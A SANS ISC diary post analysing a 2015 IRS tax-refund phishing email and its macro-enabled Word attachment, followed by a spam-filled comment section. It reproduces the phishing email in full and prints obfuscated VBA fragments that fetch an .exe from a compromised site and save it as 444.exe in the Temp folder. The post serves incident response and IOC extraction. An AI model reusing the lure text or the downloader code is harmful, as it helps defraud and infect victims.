ISC StormCast for Friday, February 20th 2015 http://isc.sans.edu/podcastdetail.html?id=4365

Fast analysis of a Tax Scam

Published: 2015-02-20
Last Updated: 2015-02-20 01:12:19 UTC
by Tom Webb (Version: 1)
2 comment(s)

It’s tax time and I’m starting to see a lot of  Phish/SPAM about this subject. Below is popular one the last couple of days.

 

=================

TAХ RЕTURN FOR ТНE YEАR 2014

RЕCАLCULАTION ОF YOUR ТАХ RЕFUND

HМRС 2013-2014

LOСАL OFFIСE No. 2669

ТАX СREDIТ ОFFICЕR: Jimmie Bеnton

TАХ REFUND ID NUМВER: 2440409

REFUND AМOUNТ: 2709.81 USD

Dеar USER,

The соntents оf this emаil and аnу attachmеnts arе соnfidentiаl and аs

арpliсablе, сорyright in thеse is resеrvеd tо IRS Rеvеnuе Customs.

Unless eхprеsslу аuthorised bу us, any further dissеmination or

distributiоn of this еmail оr its аttaсhmеnts is рrоhibited.

 

If you are nоt the intеnded rеcipiеnt оf this emаil, plеаsе reрly to

infоrm us thаt уоu have rесеived this еmаil in error and thеn

deletе it without retaining аnу сoрy.

I am sеnding this emаil to annоunсe: After the lаst аnnuаl саlсulаtiоn оf

yоur fiscаl аctivitу we hаvе determined that yоu аrе еligiblе to

rесеive a tаx refund оf 2709.81 USD

Yоu havе attaсhed the taх return form with the TАX RЕFUND NUMВЕR

ID: 2440409, сomplеte the tах rеturn fоrm аttаched to this mеssagе.

 

Aftеr соmрleting the form, pleаsе submit thе fоrm by clicking thе

SUВMIТ buttоn оn fоrm.

Sinсеrely,

Jimmiе Вenton

IRS Tax Credit Оffice

ТAХ RЕFUND ID: US2440409-IRS

 

© Сорyright 2015, IRS Rеvenue &аmр; Сustоms US

Аll rights rеserved.

======================

 

With so many of these types of mails, analysis needs to be quick to determine who may have been affected.  Here is the process.

1.    Rename the .doc file to .zip

$mv tax_refund_2440409.zip MALWARE-tax_refund_2440409.zip

 

2.    Unzip file

$unzip MALWARE-tax_refund_2440409.zip

 

 inflating: [Content_Types].xml     

 inflating: _rels/.rels             

 inflating: word/_rels/document.xml.rels  

 inflating: word/document.xml       

 inflating: word/header3.xml        

 inflating: word/footer2.xml        

 inflating: word/footer1.xml        

 inflating: word/header2.xml        

 inflating: word/header1.xml        

 inflating: word/endnotes.xml       

 inflating: word/footnotes.xml      

 inflating: word/footer3.xml        

 inflating: word/theme/theme1.xml   

 inflating: word/_rels/vbaProject.bin.rels  

 inflating: word/vbaProject.bin     

 inflating: word/settings.xml       

 inflating: word/vbaData.xml        

 inflating: word/webSettings.xml    

 inflating: word/styles.xml         

 inflating: docProps/app.xml        

 inflating: docProps/core.xml       

 inflating: word/fontTable.xml


 

3.    The vbaProject.bin is the code we want to look at and need to run strings on it.

 

$strings /word/vbaProject.bin

 

Select * from Win32_OperatingSystem

@echo off

ping 2.2.1.1 -n

$someFilePath = 'c:\Users\

\AppData\Local\Temp\

444.e

strRT =

://www.zaphira.de/wp-admin/includes/file

...


 

Within about 2 minutes I was able to determine some basic IOCs and sees if anyone actually accessed the site or tried to ping the address.

 

Deeper

If you want to dig deeper and spend a bit more time, you can install and configure  oledump which was discussed on (hxxps://isc.sans.edu/diary/oledump+analysis+of+Rocket+Kitten+-+Guest+Diary+by+Didier+Stevens/19137).

 

To list all the parts of the file, just run the script with no switches.

                   $python oledump_V0_0_8/oledump.py MALWARE-tax_refund_2440409.doc

A: word/vbaProject.bin

A1:       556 'PROJECT'

A2:        71 'PROJECTwm'

A3:        97 'UserForm1/\x01CompObj'

A4:       266 'UserForm1/\x03VBFrame'

A5:        58 'UserForm1/f'

A6:         0 'UserForm1/o'

A7: M   25751 'VBA/ThisDocument'

A8: m    1159 'VBA/UserForm1'

A9:      4506 'VBA/_VBA_PROJECT'

A10:       811 'VBA/dir'

 

To get the whole script use the following.

$python oledump.py -s A7 -v MALWARE-tax_refund_2440409.doc

 

The output is sent to the screen to look at.

Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://www.zaphira.de/wp-admin/includes/file" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)

Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"


 

In this case, oledump gave us a lot more info, but proves we were on the right track with simple strings of the file. Additionally, we can see an infected user may have a file called 444.exe . There are lots more local IOC’s we could create, but with the few network IOC’s we can get fast idea of possible affected users.

 

 

--

Tom Webb

Keywords: doc Email Office OLE Phish TAX VB Word
2 comment(s)

Comments

What's this all about ..?

Anonymous

Dec 3rd 2022
9 months ago

password reveal .

Anonymous

Dec 3rd 2022
9 months ago

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission

Anonymous

Dec 26th 2022
8 months ago

https://thehomestore.com.pk/

Anonymous

Dec 26th 2022
8 months ago

<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>

Anonymous

Dec 26th 2022
8 months ago

<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>

Anonymous

Dec 26th 2022
8 months ago

https://defineprogramming.com/

Anonymous

Dec 26th 2022
8 months ago

https://defineprogramming.com/

https://defineprogramming.com/

Dec 26th 2022
8 months ago

Enter comment here... a fake TeamViewer page, and that page led to a different type of malware. This week's infection involved a downloaded JavaScript (.js) file that led to Microsoft Installer packages (.msi files) containing other script that used free or open source programs.
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
https://clickercounter.org/

https://defineprogramming.com/

Dec 26th 2022
8 months ago

Enter corthrthmment here...

rthrth

Jan 2nd 2023
8 months ago

Login here to join the discussion.


Diary Archives